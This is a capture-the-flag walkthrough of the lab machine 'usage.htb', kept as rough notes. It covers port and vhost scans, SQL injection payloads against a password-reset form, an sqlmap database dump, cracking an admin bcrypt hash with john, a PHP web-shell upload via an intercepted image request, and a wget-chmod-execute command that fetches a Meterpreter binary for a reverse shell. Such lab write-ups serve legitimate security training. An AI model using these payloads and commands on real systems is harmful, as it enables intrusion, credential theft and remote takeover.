nmap:
    PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
|   256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:43
Completed NSE at 08:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:43
Completed NSE at 08:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:43
Completed NSE at 08:43, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.31 seconds

gobuster :
    gobuster vhost --url http://usage.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --append-domain 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://usage.htb/
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: admin.usage.htb Status: 200 [Size: 3304]
Progress: 207643 / 207644 (100.00%)
===============================================================Finished
===============================================================

looks like there there sql injection in reset page:
first we need to connect as registerited user and after try to reset the password fot the current user we login
test@test.com'OR 1=1#

We have e-mailed your password reset link to test@test.com' UNION ALL SELECT CONCAT(CONCAT('qkkvq','SsMsrUtUtBOZqfjQbqGOMEfxpgarcMCWKDbcjgei'),'qzbxq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- sVBF

saved the request in file and let the sqlmap run on the file

sqlmap :
sqlmap -r <filename> --level=5 --risk=3 --batch --threads=5

[17:16:36] [WARNING] the web server responded with an HTTP error code (419) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=gFmrQITTLBM5LsN8gAXvJoubJ9XVQuJTomDg8UOO&email=test' AND 7478=(SELECT (CASE WHEN (7478=7478) THEN 7478 ELSE (SELECT 8104 UNION SELECT 5551) END))-- -

sqlmap -r <filename> --dbms=mysql --dump-all --threads=5

there is 3 databases inside:

[INFO] fetching tables for databases: 'information_schema, performance_schema, usage_blog'

in database, in table admin_users, columns username and password manage to find:

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

in the same database but in another table i found:

{"name":"Administrator","password":"$2y$10$E9.N1P92fYSjJGQDfBrUaO05EHW4BxiQITrqjde\/WQMKnAQ7k2HJK","password_confirmation":"$2y$10$E9.N1P92fYSjJGQDfBrUaO05EHW4BxiQITrqjde\/WQMKnAQ7k2HJK","_token":"PQqkHdjeUpzpIB8ykD7YbMdBziQx1H9xUdwBSS02","_method":"PUT"}

decrypted with john :

john admin1.txt -w /usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
whatever1        (?)     

entered the admin dashboard using this credentials

in the profile settings we got picture upload

in one of attempts uploading payload i manage to discover that there is a /uploads/images/ directory

used a simple shell php script:
https://raw.githubusercontent.com/artyuum/simple-php-web-shell/master/index.php

we need to select intercept on and try to upload any image

in intercepted request we need to change filename to php file and change the content of body after PNG string 

do intercept response

it should upload the php file

launching the meterpreter listener

entering the webshell.php

next we need to upload meterpreter shell to machine using:

wget http://ip:80/rv45 rv45; chmod +x rv45; ./rv45

and we get the reverse shell and get the userflag:
6f8aeb5c85f85443eeae48a4bfdf49b4





